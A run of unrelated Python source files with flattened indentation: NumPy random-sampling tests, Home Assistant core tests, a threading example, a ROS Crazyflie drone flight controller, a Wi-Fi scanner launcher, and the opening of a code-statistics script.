desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = random.hypergeometric
desired = np.array([1, 1, 1])
self.set_seed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.set_seed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, 0)
assert_raises(ValueError, hypergeom, 10, 10, 25)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1 / 6.] * 6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (random.exponential, random.standard_gamma,
random.chisquare, random.standard_t,
random.pareto, random.weibull,
random.power, random.rayleigh,
random.poisson, random.zipf,
random.geometric, random.logseries)
probfuncs = (random.geometric, random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (random.uniform, random.normal,
random.beta, random.gamma,
random.f, random.noncentral_chisquare,
random.vonmises, random.laplace,
random.gumbel, random.logistic,
random.lognormal, random.wald,
random.binomial, random.negative_binomial)
probfuncs = (random.binomial, random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [random.noncentral_f, random.triangular,
random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
# Ensure returned array dtype is correct for platform
def test_integer_dtype(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
actual = f(*args, size=2)
assert_(actual.dtype == np.dtype('l'))
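# np.dtype('l') is the platform C "long", so the expected itemsize varies by
# platform; as a quick illustration (typical values, not guaranteed everywhere):
#
#     np.dtype('l').itemsize   # usually 4 on 64-bit Windows, 8 on 64-bit Linux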
def test_integer_repeat(int_func):
random.seed(123456789)
fname, args, md5 = int_func
f = getattr(random, fname)
val = f(*args, size=1000000)
if sys.byteorder != 'little':
val = val.byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(res == md5)
|
test_core.py
|
"""
tests.test_core
~~~~~~~~~~~~~~~
Provides tests to verify that Home Assistant core works.
"""
# pylint: disable=protected-access,too-many-public-methods
# pylint: disable=too-few-public-methods
import os
import signal
import unittest
from unittest.mock import patch
import time
import threading
from datetime import datetime, timedelta
import pytz
import homeassistant.core as ha
from homeassistant.exceptions import (
HomeAssistantError, InvalidEntityFormatError)
import homeassistant.util.dt as dt_util
from homeassistant.const import (
__version__, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,
EVENT_STATE_CHANGED, ATTR_FRIENDLY_NAME, TEMP_CELCIUS,
TEMP_FAHRENHEIT)
from tests.common import get_test_home_assistant
PST = pytz.timezone('America/Los_Angeles')
class TestHomeAssistant(unittest.TestCase):
"""
Tests the Home Assistant core classes.
"""
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.hass = get_test_home_assistant()
self.hass.states.set("light.Bowl", "on")
self.hass.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
try:
self.hass.stop()
except HomeAssistantError:
# Already stopped after the block till stopped test
pass
def test_start(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START,
lambda event: calls.append(1))
self.hass.start()
self.hass.pool.block_till_done()
self.assertEqual(1, len(calls))
# @patch('homeassistant.core.time.sleep')
    def test_block_till_stopped(self):
""" Test if we can block till stop service is called. """
with patch('time.sleep'):
blocking_thread = threading.Thread(
target=self.hass.block_till_stopped)
self.assertFalse(blocking_thread.is_alive())
blocking_thread.start()
self.assertTrue(blocking_thread.is_alive())
self.hass.services.call(ha.DOMAIN, ha.SERVICE_HOMEASSISTANT_STOP)
self.hass.pool.block_till_done()
# Wait for thread to stop
for _ in range(20):
if not blocking_thread.is_alive():
break
time.sleep(0.05)
self.assertFalse(blocking_thread.is_alive())
def test_stopping_with_sigterm(self):
calls = []
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP,
lambda event: calls.append(1))
def send_sigterm(length):
os.kill(os.getpid(), signal.SIGTERM)
with patch('homeassistant.core.time.sleep', send_sigterm):
self.hass.block_till_stopped()
self.assertEqual(1, len(calls))
class TestEvent(unittest.TestCase):
""" Test Event class. """
def test_eq(self):
now = dt_util.utcnow()
data = {'some': 'attr'}
event1, event2 = [
ha.Event('some_type', data, time_fired=now)
for _ in range(2)
]
self.assertEqual(event1, event2)
def test_repr(self):
""" Test that repr method works. #MoreCoverage """
self.assertEqual(
"<Event TestEvent[L]>",
str(ha.Event("TestEvent")))
self.assertEqual(
"<Event TestEvent[R]: beer=nice>",
str(ha.Event("TestEvent",
{"beer": "nice"},
ha.EventOrigin.remote)))
def test_as_dict(self):
event_type = 'some_type'
now = dt_util.utcnow()
data = {'some': 'attr'}
event = ha.Event(event_type, data, ha.EventOrigin.local, now)
expected = {
'event_type': event_type,
'data': data,
'origin': 'LOCAL',
'time_fired': dt_util.datetime_to_str(now),
}
self.assertEqual(expected, event.as_dict())
class TestEventBus(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.bus = ha.EventBus(ha.create_worker_pool(0))
self.bus.listen('test_event', lambda x: len)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.bus._pool.stop()
def test_add_remove_listener(self):
""" Test remove_listener method. """
self.bus._pool.add_worker()
old_count = len(self.bus.listeners)
def listener(_): pass
self.bus.listen('test', listener)
self.assertEqual(old_count + 1, len(self.bus.listeners))
# Try deleting a non registered listener, nothing should happen
self.bus.remove_listener('test', lambda x: len)
# Remove listener
self.bus.remove_listener('test', listener)
self.assertEqual(old_count, len(self.bus.listeners))
# Try deleting listener while category doesn't exist either
self.bus.remove_listener('test', listener)
def test_listen_once_event(self):
""" Test listen_once_event method. """
runs = []
self.bus.listen_once('test_event', lambda x: runs.append(1))
self.bus.fire('test_event')
# Second time it should not increase runs
self.bus.fire('test_event')
self.bus._pool.add_worker()
self.bus._pool.block_till_done()
self.assertEqual(1, len(runs))
class TestState(unittest.TestCase):
""" Test EventBus methods. """
def test_init(self):
""" Test state.init """
self.assertRaises(
InvalidEntityFormatError, ha.State,
'invalid_entity_format', 'test_state')
def test_domain(self):
state = ha.State('some_domain.hello', 'world')
self.assertEqual('some_domain', state.domain)
def test_object_id(self):
state = ha.State('domain.hello', 'world')
self.assertEqual('hello', state.object_id)
def test_name_if_no_friendly_name_attr(self):
state = ha.State('domain.hello_world', 'world')
self.assertEqual('hello world', state.name)
def test_name_if_friendly_name_attr(self):
name = 'Some Unique Name'
state = ha.State('domain.hello_world', 'world',
{ATTR_FRIENDLY_NAME: name})
self.assertEqual(name, state.name)
def test_dict_conversion(self):
state = ha.State('domain.hello', 'world', {'some': 'attr'})
self.assertEqual(state, ha.State.from_dict(state.as_dict()))
def test_dict_conversion_with_wrong_data(self):
self.assertIsNone(ha.State.from_dict(None))
self.assertIsNone(ha.State.from_dict({'state': 'yes'}))
self.assertIsNone(ha.State.from_dict({'entity_id': 'yes'}))
def test_repr(self):
""" Test state.repr """
self.assertEqual("<state happy.happy=on @ 12:00:00 08-12-1984>",
str(ha.State(
"happy.happy", "on",
last_changed=datetime(1984, 12, 8, 12, 0, 0))))
self.assertEqual(
"<state happy.happy=on; brightness=144 @ 12:00:00 08-12-1984>",
str(ha.State("happy.happy", "on", {"brightness": 144},
datetime(1984, 12, 8, 12, 0, 0))))
class TestStateMachine(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.states = ha.StateMachine(self.bus)
self.states.set("light.Bowl", "on")
self.states.set("switch.AC", "off")
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.pool.stop()
def test_is_state(self):
""" Test is_state method. """
self.assertTrue(self.states.is_state('light.Bowl', 'on'))
self.assertFalse(self.states.is_state('light.Bowl', 'off'))
self.assertFalse(self.states.is_state('light.Non_existing', 'on'))
def test_is_state_attr(self):
""" Test is_state_attr method. """
self.states.set("light.Bowl", "on", {"brightness": 100})
self.assertTrue(
self.states.is_state_attr('light.Bowl', 'brightness', 100))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 200))
self.assertFalse(
self.states.is_state_attr('light.Bowl', 'friendly_name', 'Bowl'))
self.assertFalse(
self.states.is_state_attr('light.Non_existing', 'brightness', 100))
def test_entity_ids(self):
""" Test get_entity_ids method. """
ent_ids = self.states.entity_ids()
self.assertEqual(2, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
self.assertTrue('switch.ac' in ent_ids)
ent_ids = self.states.entity_ids('light')
self.assertEqual(1, len(ent_ids))
self.assertTrue('light.bowl' in ent_ids)
def test_all(self):
states = sorted(state.entity_id for state in self.states.all())
self.assertEqual(['light.bowl', 'switch.ac'], states)
def test_remove(self):
""" Test remove method. """
self.pool.add_worker()
events = []
self.bus.listen(EVENT_STATE_CHANGED,
lambda event: events.append(event))
self.assertIn('light.bowl', self.states.entity_ids())
self.assertTrue(self.states.remove('light.bowl'))
self.pool.block_till_done()
self.assertNotIn('light.bowl', self.states.entity_ids())
self.assertEqual(1, len(events))
self.assertEqual('light.bowl', events[0].data.get('entity_id'))
self.assertIsNotNone(events[0].data.get('old_state'))
self.assertEqual('light.bowl', events[0].data['old_state'].entity_id)
self.assertIsNone(events[0].data.get('new_state'))
# If it does not exist, we should get False
self.assertFalse(self.states.remove('light.Bowl'))
self.pool.block_till_done()
self.assertEqual(1, len(events))
    def test_case_insensitivity(self):
self.pool.add_worker()
runs = []
self.bus.listen(EVENT_STATE_CHANGED, lambda event: runs.append(event))
self.states.set('light.BOWL', 'off')
self.bus._pool.block_till_done()
self.assertTrue(self.states.is_state('light.bowl', 'off'))
self.assertEqual(1, len(runs))
def test_last_changed_not_updated_on_same_state(self):
state = self.states.get('light.Bowl')
future = dt_util.utcnow() + timedelta(hours=10)
with patch('homeassistant.util.dt.utcnow', return_value=future):
self.states.set("light.Bowl", "on", {'attr': 'triggers_change'})
self.assertEqual(state.last_changed,
self.states.get('light.Bowl').last_changed)
class TestServiceCall(unittest.TestCase):
""" Test ServiceCall class. """
def test_repr(self):
""" Test repr method. """
self.assertEqual(
"<ServiceCall homeassistant.start>",
str(ha.ServiceCall('homeassistant', 'start')))
self.assertEqual(
"<ServiceCall homeassistant.start: fast=yes>",
str(ha.ServiceCall('homeassistant', 'start', {"fast": "yes"})))
class TestServiceRegistry(unittest.TestCase):
""" Test EventBus methods. """
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.pool = ha.create_worker_pool(0)
self.bus = ha.EventBus(self.pool)
self.services = ha.ServiceRegistry(self.bus, self.pool)
self.services.register("test_domain", "test_service", lambda x: None)
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
if self.pool.worker_count:
self.pool.stop()
def test_has_service(self):
""" Test has_service method. """
self.assertTrue(
self.services.has_service("test_domain", "test_service"))
self.assertFalse(
self.services.has_service("test_domain", "non_existing"))
self.assertFalse(
self.services.has_service("non_existing", "test_service"))
def test_services(self):
expected = {
'test_domain': {'test_service': {'description': '', 'fields': {}}}
}
self.assertEqual(expected, self.services.services)
def test_call_with_blocking_done_in_time(self):
self.pool.add_worker()
self.pool.add_worker()
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
self.assertTrue(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(1, len(calls))
def test_call_with_blocking_not_done_in_time(self):
calls = []
self.services.register("test_domain", "register_calls",
lambda x: calls.append(1))
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'register_calls', blocking=True))
self.assertEqual(0, len(calls))
ha.SERVICE_CALL_LIMIT = orig_limit
def test_call_non_existing_with_blocking(self):
self.pool.add_worker()
self.pool.add_worker()
orig_limit = ha.SERVICE_CALL_LIMIT
ha.SERVICE_CALL_LIMIT = 0.01
self.assertFalse(
self.services.call('test_domain', 'i_do_not_exist', blocking=True))
ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.config = ha.Config()
def test_config_dir_set_correct(self):
""" Test config dir set correct. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant"),
self.config.config_dir)
def test_path_with_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant", "test.conf"),
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(
os.path.join(data_dir, ".homeassistant", "dir", "test.conf"),
self.config.path("dir", "test.conf"))
def test_temperature_not_convert_if_no_preference(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_not_convert_if_invalid_value(self):
""" No unit conversion to happen if no preference. """
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
('25a', TEMP_CELCIUS),
self.config.temperature('25a', TEMP_CELCIUS))
def test_temperature_not_convert_if_invalid_unit(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, 'Invalid unit'),
self.config.temperature(25, 'Invalid unit'))
def test_temperature_to_convert_to_celcius(self):
self.config.temperature_unit = TEMP_CELCIUS
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(26.7, TEMP_CELCIUS),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_to_convert_to_fahrenheit(self):
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
(77, TEMP_FAHRENHEIT),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
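    # The conversions checked above follow the standard formulas (shown here as
    # a worked example): F = C * 9 / 5 + 32, so 25 C -> 77.0 F, and
    # C = (F - 32) * 5 / 9, so 80 F -> 26.666..., which rounds to 26.7 C.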
def test_as_dict(self):
expected = {
'latitude': None,
'longitude': None,
'temperature_unit': None,
'location_name': None,
'time_zone': 'UTC',
'components': [],
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
def test_exception_during_job(self):
pool = ha.create_worker_pool(1)
def malicious_job(_):
raise Exception("Test breaking worker pool")
calls = []
def register_call(_):
calls.append(1)
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (malicious_job, None))
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (register_call, None))
pool.block_till_done()
self.assertEqual(1, len(calls))
|
Thread.py
|
import threading
import time
def saygi(num):
print("running on number:%s" %num)
time.sleep(3)
if __name__ == '__main__':
t1 = threading.Thread(target=saygi, args=(1,))
t2 = threading.Thread(target=saygi, args=(2,))
t1.start()
t2.start()
print(t1.getName())
print(t2.getName())
class MyThread(threading.Thread):
def __init__(self, num):
threading.Thread.__init__(self)
self.num = num
def run(self):
print("running on number of :%s" %self.num)
time.sleep(3)
if __name__ == '__main__':
t1 = MyThread(1)
t2 = MyThread(2)
t1.start()
t2.start()
# Thread lock example
def addNum():
global num
print('___get num:',num)
time.sleep(1)
    lock.acquire()  # acquire the lock before modifying the shared data
    num -= 1  # decrement the shared variable
    lock.release()  # release the lock after the modification
num = 100  # a shared variable
thread_list = []
lock = threading.Lock()  # create a global lock
for i in range(100):
t = threading.Thread(target=addNum)
t.start()
thread_list.append(t)
for t in thread_list:  # wait for all threads to finish
t.join()
print('final num:', num)
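# A minimal sketch of the same decrement written with the lock as a context
# manager; addNum_with is an added illustration, not part of the original
# example, and performs the same locked decrement as addNum above:
def addNum_with():
    global num
    time.sleep(1)
    with lock:  # acquired before the read-modify-write, released automatically
        num -= 1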
|
Hover.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import tf
from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
from geometry_msgs.msg import PoseStamped
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.hz = 10
self.rate = rospy.Rate(self.hz)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.hover_cmd_pub = rospy.Publisher(prefix + "/cmd_hover", Hover, queue_size=1)
self.hover_cmd_sub = rospy.Subscriber("cf_hover/set_hover",PoseStamped,queue_size=1)
self.msg = Hover()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.yawrate = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
        # note: format is [x, y, z, vx, vy, vz]
self.hover_z=0.4
self.takeoff_pos = np.array([0.0,0.0,self.hover_z,0.0,0.0,0.0])
self.traj = []
self.traj_init = False
# determine direction of speed based on distance
def getSpeed(self, distance):
if distance > 0:
return 0.1
elif distance < 0:
return -0.1
else:
return 0
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
# x, y is the x, y distance relative to itself
# z is absolute z distance
# TODO: solve 0
def goTo (self, x, y, zDistance, yaw):
duration = 0
duration_x = 0
duration_y = 0
duration_z = 0
vx = 0
vy = 0
z = self.msg.zDistance # the zDistance we have before
z_scale = self.getSpeed(z) # the z distance each time z has to increment, will be changed
# for x, in secs
if x != 0:
duration_x = abs(x/0.1)
vx = self.getSpeed(x)
# for y, in secs
if y != 0:
duration_y = abs(y/0.1)
vy = self.getSpeed(y)
duration_z = abs(z-zDistance)/0.1
durations = [duration_x, duration_y, duration_z]
duration = max(durations)
if duration == 0:
return
elif duration == duration_x:
# x is the longest path
vy *= abs(y/x)
z_scale *= abs((z-zDistance)/x)
elif duration == duration_y:
# y is the longest path
vx *= abs(x/y)
z_scale *= abs((z-zDistance)/y)
elif duration == duration_z:
# z is the longest path
vx *= abs(x/(z-zDistance))
vy *= abs(y/(z-zDistance))
print(vx)
print(vy)
print(z_scale)
print(duration)
start = rospy.get_time()
while not rospy.is_shutdown():
self.msg.vx = vx
self.msg.vy = vy
self.msg.yawrate = 0.0
self.msg.zDistance = z
if z < zDistance:
print(zDistance)
print(z)
z += z_scale
else:
z = zDistance
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
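    # Worked example for goTo() above (illustrative values): with x = 0.4 m,
    # y = 0 and zDistance equal to the current zDistance, only the x leg is
    # nonzero, so duration_x = abs(0.4 / 0.1) = 4 s, vx = 0.1 m/s, vy = 0 and
    # z_scale ends up 0; the loop then streams Hover messages for roughly
    # 4 seconds at self.hz = 10 Hz, e.g.
    #
    #     cf.goTo(0.4, 0.0, cf.msg.zDistance, 0)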
# take off to z distance
def takeOff(self, zDistance):
time_range = 1 + int(10*zDistance/0.4)
while not rospy.is_shutdown():
for y in range(time_range):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = y / 25.0
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
for y in range(20):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
break
#generate a line trajectory in x,y,z, vx,vy,vz.
#target=[x,y,z], time = s
def gen_traj_line(self,target,duration):
rospy.loginfo("generating trajectory")
#example: circle traj
start=np.copy(self.takeoff_pos)
end=np.copy(target)
        n_segs = int(self.hz * duration)  # number of waypoints at the publish rate
        # calculate constant vel going from start to target
vel = (end[0:3]-start[0:3])/duration
self.traj = np.zeros((n_segs,6))
#fill in position waypoints
for i in range(3):
self.traj[:,i]=np.linspace(start[i],end[i],n_segs)
#fill in velocity waypoints
for i in range(3):
self.traj[:,i+3]=np.repeat(vel[i],n_segs)
self.traj_init=True
#
#generate a circle trajectory in x,y,z, vx,vy,vz.
#radius = m, time = s
#assumes the center is in the -x direction of the quadrotor takeoff position
def gen_traj_circle(self,radius,duration):
rospy.loginfo("generating trajectory")
#example: circle traj
start=np.copy(self.takeoff_pos)
center = start[0]-radius
        n_segs = int(self.hz * duration)  # number of waypoints at the publish rate
        # sweep the angle parameter through one full revolution
progress_traj = np.linspace(0,1,n_segs)*2*np.pi
self.traj = np.zeros((n_segs,6))
#fill in circle xyz waypoints
self.traj[:,0]=np.cos(progress_traj)*radius-radius+start[0]
self.traj[:,1]=np.sin(progress_traj)*radius+start[1]
self.traj[:,2]=np.zeros(n_segs)+start[2]
#fill in circle xyz vel waypoints
self.traj[:,3]=-np.sin(progress_traj)*radius
self.traj[:,4]=np.cos(progress_traj)*radius
self.traj_init=True
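    # The waypoints filled in above trace x(t) = r*cos(t) - r + x0 and
    # y(t) = r*sin(t) + y0 for t in [0, 2*pi], i.e. a circle of radius r whose
    # centre lies a distance r in the -x direction from the takeoff position,
    # matching the comment above; the velocity columns are the derivatives of
    # position with respect to the angle parameter. A sketch of a call
    # (illustrative values): cf.gen_traj_circle(0.15, 10) followed by
    # cf.follow_traj(10).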
def follow_traj(self,duration):
if not self.traj_init:
rospy.logerr("ERROR: tried to follow traj but no traj initialized")
return
        start = rospy.get_time()  # used below to bound how long the trajectory is followed
traj_i=0
while not rospy.is_shutdown():
self.msg.vx = self.traj[traj_i,3]
self.msg.vy = self.traj[traj_i,4]
self.msg.yawrate = 0.0
self.msg.zDistance = self.traj[traj_i,2]
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.hover_cmd_pub.publish(self.msg)
            if traj_i < np.shape(self.traj)[0] - 1:
traj_i=traj_i+1
self.rate.sleep()
# land from last zDistance
def land (self):
# get last height
zDistance = self.msg.zDistance
while not rospy.is_shutdown():
while zDistance > 0:
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
zDistance -= 0.2
self.stop_pub.publish(self.stop_msg)
def handler(cf):
duration = 10
radius = 0.15
cf.gen_traj_circle(radius,duration)
#cf.takeOff(cf.hover_z)
#cf.follow_traj(duration)
cf.goTo(0.4, 0.0, 0.0, 0)
cf.land()
if __name__ == '__main__':
rospy.init_node('traj_follow', anonymous=True)
cf1 = Crazyflie("cf1")
#cf2 = Crazyflie("cf2")
t1 = Thread(target=handler, args=(cf1,))
#t2 = Thread(target=handler, args=(cf2,))
t1.start()
#t2.start()
|
radiomanager.py
|
# -*- coding: utf-8 -*-
import pyric
import pyric.pyw as pyw
import yaml
import pprint
import argparse
import gfiwscan
from time import sleep
from multiprocessing import Process
cardprocesslist=[]
def interface_handler(interface_name):
newhandler = gfiwscan.IWScanner(iface_name=interface_name)
while True:
sleep(0.1)
newhandler.scan()
def main():
interface_name_list = []
config_file = "/opt/geofrenzy/etc/gfiwscan.yaml"
parser = argparse.ArgumentParser()
# parser.add_argument("wireless_interface")
args = parser.parse_args()
with open(config_file, 'r') as f:
        doc = yaml.safe_load(f)
ignorelist = doc['ignore']
pprint.pprint(pyw.winterfaces())
for winterface in pyw.winterfaces():
        print(winterface)
dev_dict = pyw.devinfo(winterface)
if dev_dict["mac"] in ignorelist:
print "ignoring " + winterface + " with mac " + dev_dict["mac"]
else:
interface_name_list.append(winterface)
for interface_name in interface_name_list:
p = Process(target=interface_handler, args=(interface_name, ))
p.start()
cardprocesslist.append(p)
pprint.pprint(cardprocesslist)
# scan_instance = IWScanner(iface_name=args.wireless_interface)
# while True:
# time.sleep(0.5)
# scan_instance.scan()
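# The config file read in main() is expected to carry an "ignore" list of MAC
# addresses; a minimal sketch of /opt/geofrenzy/etc/gfiwscan.yaml (addresses
# are illustrative only):
#
#     ignore:
#       - "00:11:22:33:44:55"
#       - "66:77:88:99:aa:bb"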
if __name__ == "__main__":
main()
|
obfuscation.py
|
import helpers.common as common
from multiprocessing import Process
import helpers.io as io
import math
statTypes = ["numLines", "numWhitespace", "numComments", "avgIdentLength", "numFunctions", "numDefines", "numMathOps", "lenLongestLine", "numReturns"]
# finds the mean of the data
def getMean(data, key):
total = 0.0
count = 0.0
for element in data:
total = total + float(element[key])
count = count + 1.0
return total / count
# finds the std. deviation of the data
def getDeviation(data, mean, key):
totalDiff = 0.0
count = 0.0
for element in data:
totalDiff = totalDiff + (float(element[key]) - mean)**2.0
count = count + 1.0
normalized = totalDiff / count
return math.sqrt(normalized)
# gets the z-score of a data point
def zScore(score, mean, deviation):
return (score - mean) / deviation
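# Worked example of the helpers above (illustrative numbers): for
# data = [{"numLines": 10}, {"numLines": 20}, {"numLines": 30}],
# getMean(data, "numLines") == 20.0,
# getDeviation(data, 20.0, "numLines") == sqrt((100 + 0 + 100) / 3) ~= 8.165,
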